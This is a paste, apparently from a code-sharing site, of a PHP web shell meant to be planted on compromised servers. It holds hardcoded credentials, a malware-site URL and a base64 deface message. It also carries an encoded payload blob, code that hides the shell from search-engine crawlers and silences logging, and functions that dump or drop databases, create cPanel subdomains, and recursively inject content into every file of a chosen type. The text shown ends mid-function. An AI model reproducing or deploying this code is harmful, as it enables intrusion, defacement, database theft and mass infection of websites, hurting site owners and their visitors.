· 7 years ago · Oct 06, 2018, 06:18 AM
1<?php
2// Set Username & Password
3$user = "ADMIN";
4$pass = "FUCKER";
5
6$malsite = "http://jolygoestobeinvester.ru/"; // Malware Site
7$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
8$bgimage = 'http://i.imgur.com/4NPdqCk.png'; // Background Image
9$my_shell_style = "dhanush";
10
11$curfile = __FILE__;
12$plsym = "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";
13
14@set_magic_quotes_runtime(0);
15@ini_set('error_log',NULL);
16@ini_set('log_errors',0);
17ob_start();
18error_reporting(0);
19@set_time_limit(0);
20@ini_set('max_execution_time',0);
21@ini_set('output_buffering',0);
22
23if(!empty($_SERVER['HTTP_USER_AGENT']))
24{
25 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
26 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
27 header('HTTP/1.0 404 Not Found');
28 exit; }
29}
30// Dump Database
31if($_GET["action"] == "dumpDB")
32{
33 $self=$_SERVER["PHP_SELF"];
34 if(isset($_COOKIE['dbserver']))
35 {
36 $date = date("Y-m-d");
37 $dbserver = $_COOKIE["dbserver"];
38 $dbuser = $_COOKIE["dbuser"];
39 $dbpass = $_COOKIE["dbpass"];
40 $dbname = $_GET['dbname'];
41 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
42
43 $file = "Dump-$dbname-$date";
44
45 $file="Dump-$dbname-$date.sql";
46 $fp = fopen($file,"w");
47
48 function write($data)
49 {
50 global $fp;
51
52 fwrite($fp,$data);
53
54 }
55 mysql_connect ($dbserver, $dbuser, $dbpass);
56 mysql_select_db($dbname);
57 $tables = mysql_query ("SHOW TABLES");
58 while ($i = mysql_fetch_array($tables))
59 {
60 $i = $i['Tables_in_'.$dbname];
61 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
62 write($create['Create Table'].";");
63 $sql = mysql_query ("SELECT * FROM ".$i);
64 if (mysql_num_rows($sql)) {
65 while ($row = mysql_fetch_row($sql)) {
66 foreach ($row as $j => $k) {
67 $row[$j] = "'".mysql_escape_string($k)."'";
68 }
69 write("INSERT INTO $i VALUES(".implode(",", $row).");");
70 }
71 }
72 }
73
74 fclose ($fp);
75
76 header("Content-Disposition: attachment; filename=" . $file);
77 header("Content-Type: application/download");
78 header("Content-Length: " . filesize($file));
79 flush();
80
81 $fp = fopen($file, "r");
82 while (!feof($fp))
83 {
84 echo fread($fp, 65536);
85 flush();
86 }
87 fclose($fp);
88 }
89}
90$hs_dhanush = "<style type=\"text/css\">
91<!--
92
93body,td,th {
94 color: #FF0000;
95 font-size: 14px;
96}
97tr:hover.lines
98{
99background-color:#000000;}
100tr.lines
101{
102background-color:#0C0C0C;}
103div.fixedbox
104{
105 width:70%;
106 padding:8px;
107 background-color:#171717;
108 position:fixed;
109 left:15%;
110 top:120px;
111 box-shadow: 0px 0px 10px #000;
112 -moz-border-radius: 5px 5px 5px 5px;
113 -webkit-border-radius: 5px 5px 5px 5px;
114 border-radius: 5px 5px 5px 5px;
115}
116div.logindiv{
117background-color:#171717; }
118table.btmtbl{
119border-collapse:collapse;
120border-color:red;}
121td.btmtbl{
122border-color:red;}
123input.but {
124 background-color:#000000;
125 color:#FF0000;
126 border : 1px solid #1B1B1B;
127}
128a:link {
129 color: #00FF00;
130 text-decoration:none;
131 font-weight:500;
132}
133a:hover {
134 color:#00FF00;
135 text-decoration:underline;
136}
137font.txt
138{
139 color: #00FF00;
140 text-decoration:none;
141 font-size:14px;
142}
143font.om
144{
145 color: #00FF00;
146}
147/* Write Permission Font */
148font.wrtperm
149{
150 color:#00FF00;
151}
152/* Read Permission Font */
153font.readperm
154{
155 color:#FF0000;
156}
157/* No Permission Font */
158font.noperm
159{
160 color:#FFFFFF;
161}
162font.mainmenu
163{
164 color:#FF0000;
165 text-decoration:none;
166 font-size:14px;
167}
168a:visited {
169 color: #FF0000;
170}
171input.box
172{
173 background-color:#0C0C0C;
174 color: lime;
175 border : 1px solid #1B1B1B;
176 -moz-border-radius:6px;
177 width:400;
178 border-radius:6px;
179}
180input.sbox
181{
182 background-color:#0C0C0C;
183 color: lime;
184 border : 1px solid #1B1B1B;
185 -moz-border-radius:6px;
186 width:180;
187 border-radius:6px;
188}
189select.sbox
190{
191 background-color:#0C0C0C;
192 color: lime;
193 border : 1px solid #1B1B1B;
194 -moz-border-radius:6px;
195 width:180;
196 border-radius:6px;
197}
198select.box
199{
200 background-color:#0C0C0C;
201 color: lime;
202 border : 1px solid #1B1B1B;
203 -moz-border-radius:6px;
204 width:400;
205 border-radius:6px;
206}
207
208textarea.box
209{
210 border : 3px solid #111;
211 background-color:#161616;
212 color : lime;
213 margin-top: 10px;
214 -moz-border-radius:7px;
215 border-radius:7px;
216}
217body {
218 background-color:#000000;
219}
220.myphp table
221{
222 width:100%;
223 padding:18px 10px;
224 border : 1px solid #1B1B1B;
225}
226.myphp td
227{
228 background:#111111;
229 color:#00ff00;
230 padding:6px 8px;
231 border-bottom:1px solid #222222;
232 font-size:14px;
233}
234.myphp th, th
235{
236 background:#181818;
237
238}
239-->
240</style>";
241$hs_orange = "<style type=\"text/css\">
242<!--
243body {
244background-image:url($bgimage);
245background-color:#000000;
246background-repeat:no-repeat;
247background-attachment:fixed;
248}
249/* Shell Title Color*/
250span.headtitle
251{
252 color:#F90;
253 text-decoration:none;
254
255}
256/* Login Page div*/
257div.logindiv
258{
259background-color:#000000;
260opacity:0.5;
261width:50%;
262border-radius:7px;
263margin-top:150px;
264-moz-border-radius:25px;
265height:410px;
266border: solid 1px
267#878787;
268border-radius: 13px;
269box-shadow: 0px 0px 10px
270black;
271}
272div.fixedbox
273{
274 width:70%;
275 padding:8px;
276 background-color:#171717;
277 position:fixed;
278 left:15%;
279 top:120px;
280 box-shadow: 0px 0px 35px #000;
281 -moz-border-radius: 5px 5px 5px 5px;
282 -webkit-border-radius: 5px 5px 5px 5px;
283 border-radius: 5px 5px 5px 5px;
284}
285table.tbl
286{
287border:#F90;
288}
289body,td,th {
290 color: #F90;
291 font-size: 14px;
292}
293table.btmtbl{
294border-collapse:collapse;
295border-color:#F90;}
296td.btmtbl{
297border-color:#F90;}
298/* Present Working Directory Table */
299table.pwdtbl
300{
301 border-color:#F90;
302}
303/* File List Hover */
304tr.lines:hover
305{
306background-color:#666666;
307opacity:0.5;
308}
309/* File List */
310tr.lines
311{
312 height:12px;
313}
314/* Functions Config */
315td.myfun
316{
317 display: inline;
318 padding: 1px;
319 margin: 5px;
320 border: 1px solid #AAA;
321 border-radius: 4px;
322 -moz-border-radius:4px;
323 box-shadow: 0px 0px 2px #000;
324}
325/* Functions Config Hover */
326td.myfun:hover
327{
328 box-shadow: 0px 0px 2px #FF0;
329}
330/* Button Config */
331input.but {
332 border: 1px solid #F90;
333 background-color:#000000;
334 color:#FFFFFF;
335
336 box-shadow: 0px 0px 2px #F90 inset;
337}
338/* Link Config */
339a:link {
340 color: #F90;
341 text-decoration:none;
342 font-weight:500;
343}
344/* Link Config Hover */
345a:hover {
346 color:#666666;
347 text-decoration:underline;
348}
349/* Link Config Visited */
350a:visited {
351 color: #F90;
352 text-decoration:none;
353}
354/* font Config */
355font.txt
356{
357 color: #FFFFFF;
358 text-decoration:none;
359 font-size:13px;
360}
361font.om
362{
363 color: #F90;
364}
365/* Function Font Config */
366font.fun
367{
368 color:#F90;
369}
370/* Write Permission Font */
371font.wrtperm
372{
373 color:#F90;
374}
375/* Read Permission Font */
376font.readperm
377{
378 color:#FF0000;
379}
380/* No Permission Font */
381font.noperm
382{
383 color:#FFFFFF;
384}
385/* Upload File Config */
386input.upld
387{
388 width:400;
389 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
390}
391/* Input TextBox Config */
392input.box
393{
394 width:400;
395 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
396}
397/* Input Small TextBox Config */
398input.sbox
399{
400 width:180;
401 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
402}
403/* Input Small SelectBox Config */
404select.sbox
405{
406 width:180;
407 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
408}
409/* Input SelectBox Config */
410select.box
411{
412 width:400;
413 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
414}
415/* TextArea Config */
416textarea.box
417{
418 border: 1px solid #F90;
419 color:#FFFFFF;
420 margin-top: 10px;
421 box-shadow: 0px 0px 3px #F90 inset;
422 background-color: #000000;
423 opacity: 0.50;
424}
425.myphp table
426{
427 width:100%;
428 padding:18px 10px;
429 border: 1px solid #F90;
430}
431.myphp td
432{
433 padding:6px 8px;
434 border-bottom:1px solid #222222;
435 font-size:14x;
436}
437
438-->
439</style>";
440$hs_404 = "<style type=\"text/css\">
441<!--
442span.headtitle
443{
444 color:#00ff00;
445 text-decoration:none;
446
447}
448body, th{
449 color:#00ff00;
450 background-color:#000000;
451 font-size: 13px;
452}
453div.logindiv{
454background-color:#171717; }
455div.fixedbox
456{
457 width:70%;
458 padding:8px;
459 background-color:#171717;
460 position:fixed;
461 left:15%;
462 top:120px;
463 box-shadow: 0px 0px 35px #000;
464 -moz-border-radius: 5px 5px 5px 5px;
465 -webkit-border-radius: 5px 5px 5px 5px;
466 border-radius: 5px 5px 5px 5px;
467}
468table.tbl
469{
470border:#00ff00;
471}
472table.btmtbl{
473border-collapse:collapse;
474border-color:lime;}
475td.btmtbl{
476border-color:lime;}
477tr.lines:hover
478{
479 background-color:#5e5e5e;
480}
481tr.lines
482{
483 background-color:#000000;
484 height:12px;
485 font-size: 14px;
486}
487td.myfun
488{
489 border-style:none;
490 margin: 5px;
491}
492td.myfun:hover
493{
494 box-shadow: 0px 0px 2px #FF0;
495}
496input.but {
497 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
498}
499a:link {
500 color: #00ff00;
501 text-decoration:none;
502 font-weight:500;
503}
504a:visited
505{
506color:#00ff00;
507}
508a:hover {
509 background:#ff0000;
510}
511font.mainmenu
512{
513 font-size:14px;
514}
515font.txt
516{
517 color: #FFFFFF;
518 text-decoration:none;
519 font-size:13px;
520}
521font.om
522{
523 color:#00FF00;
524}
525font.fun
526{
527
528 color:#00ff00;
529}
530font.wrtperm
531{
532 color:#00ff00;
533}
534font.readperm
535{
536 color:#FF0000;
537}
538font.noperm
539{
540 color:#FFFFFF;
541}
542input.upld
543{
544 width:400;
545 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
546}
547input.box
548{
549 width:400;
550 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
551}
552input.sbox
553{
554 width:180;
555 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
556}
557select.sbox
558{
559 width:180;
560 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
561}
562select.box
563{
564 width:400;
565 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
566}
567
568textarea.box
569{
570 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
571}
572.myphp table
573{
574 width:100%;
575 padding:18px 10px;
576 border : 1px solid #00FF00;
577}
578.myphp td
579{
580 background:#111111;
581 color:#00ff00;
582 padding:6px 8px;
583 border-bottom:1px solid #222222;
584 font-size:13px;
585}
586.myphp th,
587{
588 background:#181818;
589
590}
591-->
592</style>";
593$hs_phizo = "<style type=\"text/css\">
594<!--
595span.headtitle
596{
597 color:#000000;
598 text-decoration:none;
599
600}
601div.logindiv
602{
603background-color:#CCC;
604width:50%;
605border-radius:7px;
606margin-top:150px;
607-moz-border-radius:25px;
608height:410px;
609border: solid 1px
610#878787;
611border-radius: 13px;
612box-shadow: 0px 0px 10px
613black;
614}
615div.fixedbox
616{
617 width:70%;
618 padding:8px;
619 background-color:#999999;
620 position:fixed;
621 left:15%;
622 top:120px;
623 box-shadow: 0px 0px 10px #000;
624 -moz-border-radius: 5px 5px 5px 5px;
625 -webkit-border-radius: 5px 5px 5px 5px;
626 border-radius: 5px 5px 5px 5px;
627}
628body,td,th {
629 color: #000000;
630 font-size: 14px;
631}
632table.pwdtbl
633{
634 width:95%;
635 background-color:#999999;
636 -moz-border-radius:25px;
637 border-radius:25px;
638}
639table#maintable
640{
641 background-color: #999999;
642 border: solid 1px #878787;
643 border-radius: 13px;
644 box-shadow: 0px 0px 10px #000;
645 width: 100%;
646 margin: auto;
647 height: auto;
648}
649tr.lines:hover
650{
651background-color:#C0C0C0;
652}
653tr.lines
654{
655 background-color:#999999;
656 height:12px;
657}
658td.myfun
659{
660 display: inline;
661 padding: 1px;
662 margin: 5px;
663 border: 1px solid #AAA;
664 border-radius: 4px;
665 -moz-border-radius:4px;
666 box-shadow: 0px 0px 2px #000;
667}
668td.myfun:hover
669{
670 box-shadow: 0px 0px 2px #FF0;
671}
672input.but {
673 border: 1px solid #787878;
674 border-radius: 5px;
675 box-shadow: 0px 0px 2px #000 inset;
676}
677a:link,a:visited {
678 color: #000000;
679 text-decoration:none;
680 font-weight:500;
681}
682a:hover {
683 color:#666666;
684 text-decoration:underline;
685}
686font.mainmenu
687{
688 display: inline;
689 padding: 1px;
690 border: 1px solid #AAA;
691 border-radius: 4px;
692 box-shadow: 0px 0px 2px #000;
693 text-decoration: none;
694 font-weight: bold;
695 color: #696969;
696}
697font.txt
698{
699 color: #000000;
700 text-decoration:none;
701 font-size:13px;
702}
703font.om
704{
705 color:#000000;
706}
707font.fun
708{
709 color: #696969;
710}
711font.wrtperm
712{
713 color:#000000;
714}
715font.readperm
716{
717 color:#000000;
718}
719font.noperm
720{
721 color:#000000;
722}
723input.upld
724{
725 border: 1px solid #787878;
726 box-shadow: 0px 0px 3px #000 inset;
727 background-color: #AAA;
728 font-family: Courier;
729 -moz-border-radius:6px;
730 width:400;
731 border-radius:6px;
732}
733input.box
734{
735 border: 1px solid #787878;
736 box-shadow: 0px 0px 3px #000 inset;
737 background-color: #AAA;
738 font-family: Courier;
739 -moz-border-radius:6px;
740 width:400;
741 border-radius:6px;
742}
743input.sbox
744{
745 border: 1px solid #787878;
746 box-shadow: 0px 0px 3px #000 inset;
747 background-color: #AAA;
748 font-family: Courier;
749 -moz-border-radius:6px;
750 width:180;
751 border-radius:6px;
752}
753select.sbox
754{
755 border: 1px solid #787878;
756 box-shadow: 0px 0px 3px #000 inset;
757 background-color: #AAA;
758 font-family: Courier;
759 -moz-border-radius:6px;
760 width:180;
761 border-radius:6px;
762}
763select.box
764{
765 border: 1px solid #787878;
766 box-shadow: 0px 0px 3px #000 inset;
767 background-color: #AAA;
768 font-family: Courier;
769 -moz-border-radius:6px;
770 width:400;
771 border-radius:6px;
772}
773
774textarea.box
775{
776 border: 1px solid #787878;
777 margin-top: 10px;
778 -moz-border-radius:7px;
779 box-shadow: 0px 0px 3px #000 inset;
780 background-color: #AAA;
781}
782textarea:focus
783{
784 box-shadow: 0px 0px 3px #FF0 inset;
785}
786body {
787 background-color:#C0C0C0;
788}
789.myphp table
790{
791 width:100%;
792 padding:18px 10px;
793 border : 1px solid #1B1B1B;
794}
795.myphp td
796{
797 /*background:#111111; */
798 color:#000000;
799 padding:6px 8px;
800 border-bottom:1px solid #222222;
801 font-size:14px;
802}
803.myphp th, th
804{
805 background:#999999;
806
807}
808-->
809</style>";
810
811 if($_COOKIE['style']=='dhanush')
812 $shellstyle = $hs_dhanush;
813 elseif($_COOKIE['style']=='404')
814 $shellstyle = $hs_404;
815 elseif($_COOKIE['style']=='orange')
816 $shellstyle = $hs_orange;
817 elseif($_COOKIE['style']=='phizo')
818 $shellstyle = $hs_phizo;
819 else
820 {
821 if($my_shell_style == "phizo")
822 $shellstyle = $hs_phizo;
823 elseif($my_shell_style=='dhanush')
824 $shellstyle = $hs_dhanush;
825 elseif($my_shell_style=='404')
826 $shellstyle = $hs_404;
827 elseif($my_shell_style=='orange')
828 $shellstyle = $hs_orange;
829 }
830if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
831{
832 $self=$_SERVER["PHP_SELF"];
833 $os = "N/D";
834 $bdmessage = null;
835 $dir = getcwd();
836
837 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
838 $path=explode('/',$url);
839 $curr_url =str_replace($path[count($path)-1],'',$url);
840
841 if(strtolower(substr(PHP_OS,0,3)) == "win")
842 {
843 $SEPARATOR = '\\';
844 $os = "Windows";
845 $directorysperator="\\";
846 }
847 else
848 {
849 $os = "Linux";
850 $directorysperator='/';
851 }
852 function Trail($d,$directsperator)
853 {
854 $d=explode($directsperator,$d);
855 array_pop($d);
856 array_pop($d);
857 $str=implode($d,$directsperator);
858 return $str;
859 }
860
861 function randomt()
862 {
863 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
864 srand((double)microtime()*1000000);
865 $i = 0;
866 $pass = '' ;
867
868 while ($i <= 7)
869 {
870 $num = rand() % 33;
871 $tmp = substr($chars, $num, 1);
872 $pass = $pass . $tmp;
873 $i++;
874 }
875 return $pass;
876 }
877 function make_subdomain($subDomain,$cPanelUser,$cPanelPass,$subindex)
878 {
879 $rootDomain = $_SERVER['SERVER_NAME'];
880 $buildRequest = "/frontend/x3/subdomain/doadddomain.html?rootdomain=" . $rootDomain . "&domain=" . $subDomain . "&dir=public_html/" . $subDomain;
881
882 $openSocket = fsockopen('localhost',2082);
883 if(!$openSocket) {
884 return "Socket error<BR>";
885 }
886
887 $authString = $cPanelUser . ":" . $cPanelPass;
888 $authPass = base64_encode($authString);
889 $buildHeaders = "GET " . $buildRequest ."\r\n";
890 $buildHeaders .= "HTTP/1.0\r\n";
891 $buildHeaders .= "Host:localhost\r\n";
892 $buildHeaders .= "Authorization: Basic " . $authPass . "\r\n";
893 $buildHeaders .= "\r\n";
894
895 fputs($openSocket, $buildHeaders);
896 while(!feof($openSocket)) {
897 fgets($openSocket,128);
898 }
899 fclose($openSocket);
900 // create index file
901 @chdir($subDomain);
902 $file5 = fopen("index.html","w");
903 fputs($file5,$subindex);
904 fclose($file5);
905 $newDomain = "http://" . $subDomain . "." . $rootDomain . "/<BR>";
906
907 return $newDomain;
908}
909
910 // Database functions
911 function listdatabase()
912 {
913 $self=$_SERVER["PHP_SELF"];
914 ?>
915 <br>
916 <form>
917 <table>
918 <tr>
919 <td><input type="text" class="box" name="dbname"></td>
920 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
921 </tr>
922 </table>
923 </form>
924 <br>
925 <?php
926 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
927 $result = mysql_query("SHOW DATABASE");
928 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
929
930 $pDB = mysql_list_dbs( $mysqlHandle );
931 $num = mysql_num_rows( $pDB );
932 for( $i = 0; $i < $num; $i++ )
933 {
934 $dbname = mysql_dbname( $pDB, $i );
935 mysql_select_db($dbname,$mysqlHandle);
936 $result = mysql_query("SHOW TABLES");
937 $num_of_tables = mysql_num_rows($result);
938 echo "<tr>\n";
939 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
940 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
941 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
942 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
943 echo "</tr>\n";
944 }
945 echo "</table>\n";
946 mysql_close($mysqlHandle);
947 }
948
949 function listtable()
950 {
951 $self=$_SERVER["PHP_SELF"];
952 $dbserver = $_COOKIE["dbserver"];
953 $dbuser = $_COOKIE["dbuser"];
954 $dbpass = $_COOKIE["dbpass"];
955 $dbname = $_GET['dbname'];
956 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
957 ?>
958 <br><br>
959 <form>
960 <table>
961
962 <tr>
963 <td><input type="text" class="box" name="tablename"></td>
964 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
965 </tr>
966 </table>
967
968 <br>
969 <form>
970 <table>
971 <tr>
972 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
973 </tr>
974 <tr>
975 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
976 </tr>
977 </table>
978 </form>
979
980 <?php
981
982 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
983
984 mysql_select_db($dbname);
985 $pTable = mysql_list_tables( $dbname );
986
987 if( $pTable == 0 ) {
988 $msg = mysql_error();
989 echo "<h3>Error : $msg</h3><p>\n";
990 return;
991 }
992 $num = mysql_num_rows( $pTable );
993
994 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
995
996 for( $i = 0; $i < $num; $i++ )
997 {
998 $tablename = mysql_tablename( $pTable, $i );
999 $result = mysql_query("select * from $tablename");
1000 $num_rows = mysql_num_rows($result);
1001 echo "<tr>\n";
1002 echo "<td>\n";
1003 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
1004 echo "</td>\n";
1005 echo "<td>\n";
1006 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
1007 echo "</td>\n";
1008 echo "<td>\n";
1009 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
1010 echo "</td>\n";
1011 echo "<td>\n";
1012 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
1013 echo "</td>\n";
1014 echo "<td>\n";
1015 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
1016 echo "</td>\n";
1017 echo "</tr>\n";
1018 }
1019
1020 echo "</table></form>";
1021 mysql_close($mysqlHandle);
1022 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
1023 }
1024
1025
1026 function paramexe($n, $v)
1027 {
1028 $v = trim($v);
1029 if($v)
1030 {
1031 echo '<span><font size=3>' . $n . ': </font></span>';
1032 if(strpos($v, "\n") === false)
1033 echo '<font size=2>' . $v . '</font><br>';
1034 else
1035 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1036 }
1037 }
1038 $mycount = 0;
1039 function injectdir($dir,$filetype,$mode,$lolinject)
1040 {
1041 global $curfile,$mycount;
1042 if (is_dir($dir))
1043 {
1044 $objects = scandir($dir);
1045 foreach ($objects as $object)
1046 {
1047 if ($object != '.' && $object != '..' && strpos($dir, 'dhanush') == false && strpos($dir, 'sym') == false)
1048 {
1049 if (is_dir($dir . '/' . $object))
1050 {
1051 // if we find a directory, do a recursive call
1052 injectdir($dir . '/' . $object,$filetype,$mode,$lolinject);
1053 }
1054 else
1055 {
1056 $file_parts = pathinfo($object);
1057 if($file_parts['extension'] == $filetype)
1058 {
1059 if(($dir . '/' . $object) == $curfile)
1060 continue;
1061 $fp=fopen($dir . '/' . $object,$mode);
1062 if (fputs($fp,$lolinject))
1063 {
1064 $mycount++;
1065 echo '<br><font class=txt >'.$dir . '/' . $object.' was injected<br></font>';
1066 }
1067 else
